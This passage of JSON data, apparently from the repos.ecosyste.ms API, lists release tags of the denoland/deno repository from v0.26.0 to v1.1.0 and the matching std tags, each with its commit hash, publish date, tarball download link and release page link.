deno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/t